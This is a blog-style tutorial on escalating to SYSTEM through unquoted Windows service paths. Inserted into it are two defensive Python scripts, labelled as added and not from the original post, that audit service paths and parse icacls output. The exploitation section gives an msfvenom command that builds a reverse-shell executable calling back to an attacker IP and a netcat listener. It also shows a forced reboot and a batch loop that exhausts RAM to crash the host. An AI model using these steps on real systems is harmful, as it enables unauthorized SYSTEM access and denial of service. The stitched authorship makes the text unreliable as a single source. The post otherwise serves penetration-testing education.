Unquoted Service Paths

Recipe For Root
4 min read · May 13, 2021

An unquoted service path is a service whose binary path is not enclosed in quotes. I will go into detail on why this can be a problem.

Prerequisites

  • Service must be running with higher privileges (LocalSystem, or Administrator)
  • Service binary path must be unquoted and contain spaces
  • Must have write access to a location in the path

Background

Before we can understand the issue, we need some background on how Windows runs programs. Let’s take this program for example:

"C:\Program Files\Program Folder\sub folder\EatCake.exe"

When Windows starts a service, it has to search for the service. Generally this is an easy task because the path is specifically defined within quotes. Since the path to the program EatCake.exe is in quotes, Windows has no questions about where to find the executable. This is the correct way to implement a service.

Now what if the quotes are left off of the program?

C:\Program Files\Program Folder\sub folder\EatCake.exe

Let’s say we want to execute the service EatCake.exe. Windows reads the path from left to right and, at each space, checks whether the text so far names an executable. So in our example, Windows will check for the program in this order:

C:\Program.exe
C:\Program Files\Program.exe
C:\Program Files\Program Folder\sub.exe
C:\Program Files\Program Folder\sub folder\EatCake.exe

Note: .exe is appended to the partial name at each space if it is not already there, and that name is tried as the program.

If nothing in the path has been tampered with, Windows eventually finds EatCake.exe on the 4th try and executes it. So how DO we exploit this vulnerable service?
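To make the search order concrete, here is an added Python example (not code from the original post) that reproduces the left-to-right resolution described above and, going a step beyond the post, audits a list of service ImagePath values and produces the quoted fix an administrator would apply. The service names and paths are constructed for illustration, and the `sc.exe` command string assumes the usual cmd.exe escaping of embedded quotes.

```python
"""Added example (not from the original post): reproduce how the Windows
service loader resolves an unquoted ImagePath, then audit a list of service
entries and emit the quoted fix. Service names and paths below are
constructed for illustration; real values live under
HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>\\ImagePath."""
import re
from typing import List, Tuple

EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def split_image_path(image_path: str) -> Tuple[str, str, bool]:
    """Return (executable, arguments, was_quoted) for a service ImagePath."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                      # unterminated quote: take the rest
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    m = EXE_RE.search(s)                   # executable ends at the first .exe
    if m:
        return s[:m.end()], s[m.end():].strip(), False
    return s, "", False


def candidate_paths(image_path: str) -> List[str]:
    """Paths Windows tries, in order, for an unquoted executable path.

    Reads left to right, stopping at each space; appends .exe when the
    partial name does not already end with it. A quoted path yields only
    the real executable."""
    exe, _, quoted = split_image_path(image_path)
    if quoted:
        return [exe]
    tokens = exe.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        partial = " ".join(tokens[:i])
        if not partial.lower().endswith(".exe"):
            partial += ".exe"
        candidates.append(partial)
    return candidates


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the executable portion is unquoted and contains a space."""
    exe, _, quoted = split_image_path(image_path)
    return not quoted and " " in exe


def quoted_fix(image_path: str) -> str:
    """Corrected ImagePath: executable in quotes, arguments untouched."""
    exe, args, _ = split_image_path(image_path)
    return f'"{exe}" {args}'.rstrip()


def remediation_command(name: str, image_path: str) -> str:
    """sc.exe command that rewrites the path with quotes (cmd.exe escaping)."""
    exe, args, _ = split_image_path(image_path)
    inner = '\\"' + exe + '\\"' + (" " + args if args else "")
    return f'sc.exe config "{name}" binPath= "{inner}"'


def audit(services):
    """Return (name, hijack_candidates, fixed_path) for each risky entry.

    hijack_candidates are the paths tried *before* the real executable,
    i.e. the locations a defender must confirm are not writable by
    low-privilege users."""
    findings = []
    for name, path in services:
        if is_unquoted_with_spaces(path):
            findings.append((name, candidate_paths(path)[:-1], quoted_fix(path)))
    return findings


# Constructed sample entries (not real services).
SAMPLE_SERVICES = [
    ("EatCake", r"C:\Program Files\Program Folder\sub folder\EatCake.exe"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe" -service'),
    ("NoSpaces", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("Backup Agent", r"C:\Program Files\Backup Agent\agent.exe --port 8443"),
]

if __name__ == "__main__":
    for name, hijacks, fix in audit(SAMPLE_SERVICES):
        print(f"[!] {name}: unquoted path with spaces")
        for h in hijacks:
            print(f"    would be tried first: {h}")
        print(f"    fix: {remediation_command(name, dict(SAMPLE_SERVICES)[name])}")
```

Note that `svchost.exe -k netsvcs` is correctly left alone: the string contains spaces, but the executable portion does not, so there is nothing for the loader to misresolve. The quoted `GoodSvc` entry yields a single candidate, which is the whole point of the fix.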

Exploitation

If we can create a malicious program called EatCake.exe and place it somewhere in the path before the real EatCake.exe program, hopefully Windows will execute our malicious version of the program before the real one.

First step is to check if we have write access to each of these locations:

C:\
C:\Program Files\
C:\Program Files\Program Folder\
C:\Program Files\Program Folder\sub folder\

We can do this by using the built-in Windows program icacls.

icacls "C:\"
icacls "C:\Program Files\"
icacls "C:\Program Files\Program Folder\"
icacls "C:\Program Files\Program Folder\sub folder\"

By running each of these we should get some output. Let’s see if we have write access to the second-level folder by running icacls "C:\Program Files\Program Folder\"

icacls "C:\Program Files\Program Folder"
C:\Program Files\Program Folder Everyone:(OI)(CI)(F)
                                NT SERVICE\TrustedInstaller:(I)(F)
                                NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                NT AUTHORITY\SYSTEM:(I)(F)
                                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                BUILTIN\Administrators:(I)(F)
                                BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                BUILTIN\Users:(I)(RX)
                                BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

This is a lot of output, so I’ll point you to the important parts. Starting at line 2 of the output you will see a list of groups, each followed by some letters in parentheses. The one we are interested in is Everyone:(OI)(CI)(F)

  • Everyone — This is the group being identified
  • OI — Object Inherit (This means files below inherit this permission)
  • CI — Container Inherit (This means containers below inherit this permission)
  • F — Full Control

Any time you see Everyone in a permissions listing, the permissions that follow apply to every user on that system. In our case, Everyone has Full control (F), which includes read and write access, on “C:\Program Files\Program Folder”.
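As an added example, not from the original post, here is a Python parser for icacls output that flags ACEs granting write-capable rights to low-privilege principals on the folder itself. It runs over the listing shown above (reformatted one ACE per line) and shows the finding disappear once Everyone is reduced to RX, which is the hardening an administrator would apply. The principal list and the set of rights treated as "write" are my assumptions, and inherit-only ACEs are skipped because they grant nothing on the folder where a file would be dropped.

```python
"""Added example (not from the original post): parse icacls output and flag
ACEs on the folder itself that grant write-capable rights to low-privilege
principals. The sample output is the post's listing for
C:\\Program Files\\Program Folder, reformatted one ACE per line. The
principal list and the set of rights treated as "write" are assumptions."""
import re
from typing import List, Set, Tuple

ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple and specific rights that let a caller create or replace files.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD"}
# Principals any unprivileged user is a member of (assumed list).
LOW_PRIV_PRINCIPALS = {
    "Everyone",
    r"BUILTIN\Users",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\INTERACTIVE",
}

SAMPLE_PATH = r"C:\Program Files\Program Folder"
# The post's icacls listing, one ACE per line.
SAMPLE_ICACLS = r"""C:\Program Files\Program Folder Everyone:(OI)(CI)(F)
                                NT SERVICE\TrustedInstaller:(I)(F)
                                NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                NT AUTHORITY\SYSTEM:(I)(F)
                                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                BUILTIN\Administrators:(I)(F)
                                BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                BUILTIN\Users:(I)(RX)
                                BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(path: str, output: str) -> List[Tuple[str, Set[str], Set[str]]]:
    """Return (principal, inheritance_flags, rights) for each ACE line."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):          # first line carries the path too
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        principal, blob = m.group(1), m.group(2)
        tokens = re.findall(r"\(([^)]*)\)", blob)
        flags = {t for t in tokens if t in INHERIT_FLAGS}
        rights: Set[str] = set()
        for t in tokens:
            if t not in INHERIT_FLAGS:     # simple (F) or specific (GR,GE) rights
                rights.update(r.strip() for r in t.split(","))
        aces.append((principal, flags, rights))
    return aces


def writable_by_low_priv(path: str, output: str) -> List[Tuple[str, List[str]]]:
    """ACEs that let low-privilege principals write into the folder itself.

    Inherit-only (IO) ACEs are skipped: they shape permissions on children
    but grant nothing on the folder where a file would be dropped."""
    findings = []
    for principal, flags, rights in parse_icacls(path, output):
        if "IO" in flags or principal not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append((principal, granted))
    return findings


if __name__ == "__main__":
    for principal, granted in writable_by_low_priv(SAMPLE_PATH, SAMPLE_ICACLS):
        print(f"[!] {principal} can write to {SAMPLE_PATH} via {','.join(granted)}")
```

Run this over the output of each `icacls` command listed earlier; any folder that yields a finding, combined with an unquoted service path passing through it, is the condition the rest of this post exploits, and the remediation is to quote the path and strip the write ACE.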

So let’s take a step back. We know that Windows reads unquoted paths from left to right and checks at each space, and we have write access to “C:\Program Files\Program Folder\”. Theoretically we can create a malicious program called EatCake.exe and place it in the following location:

C:\Program Files\Program Folder\EatCake.exe

Now when the service EatCake.exe is executed, our malicious version should be executed before Windows finds the real version.

Now I will explain how to create our malicious program to get an elevated shell.

Reverse Shell

A popular method is to create a reverse shell back to our attacking machine. We can do this by using a tool called msfvenom which comes built-in with Kali. If we run the following command on our Kali machine, we will create a reverse shell called EatCake.exe

root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.99 LPORT=443 -f exe -o EatCake.exe

Now that we have our newly created program EatCake.exe, we need to drop it in the location mentioned previously which is “C:\Program Files\Program Folder\EatCake.exe”

After we have copied the file over to the target machine and placed it in the location above, we should start a listener on our attacking Kali machine so we can “catch” the reverse shell when the malicious service is executed. We do this by running the command:

root@kali:~# nc -nlvp 443

Now that our listener is running, we need to restart the service. We can do this by doing one of the following:

  • Wait for someone to restart the computer
  • Wait for someone to restart the service
  • Shut down the computer and wait for someone to turn it on.
  • If we have restart privileges (most likely not) then we can manually restart the service

We are going to assume we don’t have privileges to restart the service or the machine, so we will shut down the machine ourselves by running this command on the Windows machine:

shutdown /r /t 0

When the computer starts up again (someone else boots up the system), the service will automatically be started, but our malicious EatCake.exe program will be executed instead which will run the reverse shell and connect back to our computer with SYSTEM privileges.

root@kali:~# nc -nvlp 443
listing on [any] 443 ...
192.168.1.77: inverse host lookup failed: Unknown host
connect to [192.168.1.99] 56733
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\pizza\Desktop> whoami
NT AUTHORITY\SYSTEM

Keep in mind that in a real world scenario shutting down a production server is a bad idea and will raise a lot of flags. Use it as a last resort.

There are other methods I’ve used to restart a computer as well. You can spawn an infinite loop that crashes the computer by eating up resources: save the following as a .bat file and execute it. After about 10 minutes the computer should have used up all of its RAM and restart.

@echo
:crash
start
goto crash


Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP